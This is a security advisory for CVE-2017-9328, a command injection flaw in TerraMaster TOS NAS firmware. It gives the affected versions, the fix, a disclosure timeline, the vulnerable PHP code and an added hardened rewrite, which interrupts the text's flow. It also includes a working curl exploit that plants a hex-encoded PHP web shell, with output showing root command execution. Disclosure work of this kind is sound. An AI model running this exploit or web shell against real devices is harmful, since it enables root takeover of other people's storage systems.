Title: TOS Remote Code Execution Vulnerability
Advisory URL: https://gist.github.com/hybriz/63bbe2d963e531357aca353c74dd1ad5
Date published: 2017-09-13
Date of last update: 2017-09-13
Vendor: TerraMaster
Disclosure scheme: 60-day deadline Responsible Disclosure
State: Fixed.
Class: Improper Neutralization of Special Elements used in a Command [CWE-77]
Impact: Code execution as root
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-9328
A shell metacharacter injection vulnerability was found in a PHP file that leads to remote code execution as root.
This vulnerability has been confirmed and exploited successfully in the following versions of TOS:
- TOS <= 3.0.31
- TOS <= 2.515
- TOS <= 2.266
Vendor was contacted, vulnerability was reported and is now fixed in the beta release of TOS (3.0.34 onwards).
Possible mitigation involves disallowing network access to the web interface.
To fully correct this vulnerability one needs to upgrade to version 3.0.34 or higher.
Thanks to Simone Margaritelli (evilsocket) for pointing out the existence of this vendor and finding other vulnerabilities on TOS.
At the start of the file "/usr/www/include/ajax/GetTest.php", one can see:
<?php
include_once "../../include/app.php";
$data = $_POST;
$file = "/mnt/base/.".basename($data['dev'])."test";
if(!file_exists($file)) touch($file);
if(isset($data['testtype'])){ // start or stop the process...
    if($data['testtype'] != 'stop'){
        $line = $data['dev'].':'.$data['testtype'].":".time();
        shell_exec("echo -e \"".$line."\" > $file");
    }
    $return = smartscan($data['dev'],$data['testtype']);
The input passed to shell_exec() is not sanitized: only $file goes through basename(), while $data['dev'] and $data['testtype'] are concatenated into the command string as received, so shell metacharacters in either POST field are interpreted by the shell.
As a demonstration, the following two commands exploit the issue and confirm its presence.
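For comparison, the following is a hardened rewrite of the excerpt above. It is an added example written for this advisory, not TerraMaster's code or the vendor's actual fix; the names $data, $file, $line and smartscan() come from the excerpt, while the allowlist patterns, the error handling and the use of file_put_contents() in place of the shell command are assumptions about how the handler could be restructured.

```php
<?php
// Added example (not the vendor's code): hardened version of the GetTest.php
// excerpt. The marker line is written with a PHP file API, so no shell is
// spawned and there is no command string for user input to break out of.
include_once "../../include/app.php";

$data = $_POST;

// Allowlist both user-controlled fields before they are used anywhere.
// Assumption: a device name is a short token of letters, digits, '_' and '-',
// with no path separators and no shell metacharacters.
$dev = isset($data['dev']) ? (string) $data['dev'] : '';
if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $dev)) {
    http_response_code(400);
    exit('invalid dev');
}

// testtype is a small enumeration; reject anything outside it.
$allowedTypes = ['start', 'stop'];
$testtype = isset($data['testtype']) ? (string) $data['testtype'] : '';
if (!in_array($testtype, $allowedTypes, true)) {
    http_response_code(400);
    exit('invalid testtype');
}

// $dev has already been validated, so basename() is no longer load-bearing,
// but keeping the same path layout as the original.
$file = "/mnt/base/." . $dev . "test";
if (!file_exists($file)) {
    touch($file);
}

if ($testtype !== 'stop') {
    $line = $dev . ':' . $testtype . ':' . time();
    // Original: shell_exec("echo -e \"" . $line . "\" > $file");
    // Replacement: direct file write, identical result, no shell involved.
    file_put_contents($file, $line . "\n");
}

$return = smartscan($dev, $testtype);
```

Two points in the design: validation happens on the raw fields before they reach either the filesystem path or any other function (in the original, basename() protected $file but not $line), and the shell is removed entirely rather than escaped. If a shell invocation were unavoidable, every interpolated value would have to go through escapeshellarg(), but not building a command string at all is the simpler and safer choice here.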
Exploit:
curl 'http://IP-ADDRESS-OF-NAS:8181/include/ajax/GetTest.php' -X POST --data 'dev=b1bebe&testtype=start;\"$(echo -en "\\x3c\\x3f\\x70\\x68\\x70\\x20\\x70\\x61\\x73\\x73\\x74\\x68\\x72\\x75\\x28\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x22\\x69\\x22\\x5d\\x29\\x3b\\x20\\x3f\\x3e\\n" > xploited.php);'
This will generate a file called "xploited.php" which runs arbitrary commands, as one can see in the console output below.
$ curl 'http://192.168.100.100:8181/include/ajax/GetTest.php' -X POST --data 'dev=b1bebe&testtype=start;\"$(echo -en "\\x3c\\x3f\\x70\\x68\\x70\\x20\\x70\\x61\\x73\\x73\\x74\\x68\\x72\\x75\\x28\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x22\\x69\\x22\\x5d\\x29\\x3b\\x20\\x3f\\x3e\\n" > xploited.php);'
<br />
<b>Fatal error</b>: Call to undefined function smartscan() in <b>/mnt/base/www/include/ajax/GetTest.php</b> on line <b>12</b><br />
$ curl 'http://192.168.100.100:8181/include/ajax/xploited.php' -b 'i=ls -latr /mnt/base/www/include/ajax/xploited.php'
-rw-r--r-- 1 root root 35 Jun 20 16:29 /mnt/base/www/include/ajax/xploited.php
$ curl 'http://192.168.100.100:8181/include/ajax/xploited.php' -b 'i=id && uname -a && cat /proc/version'
uid=0(root) gid=0(root)
Linux Tnas-XXXXXX 2.6.31.8 #8 PREEMPT Sun Mar 16 16:51:41 CST 2014 armv5tel GNU/Linux
Linux version 2.6.31.8 (root@rds-02) (gcc version 4.3.2 (sdk3.2rc1-ct-ng-1.4.1) ) #8 PREEMPT Sun Mar 16 16:51:41 CST 2014
$
2017-06-20: Shared this advisory with vendor via provided support email
2017-06-22: Vulnerability acknowledged and information relayed to engineers
2017-09-07: Sent e-mail asking for news
2017-09-07: Beta version updated with fix (beta 3.0.34)
2017-09-08: Vendor replied with link to patched version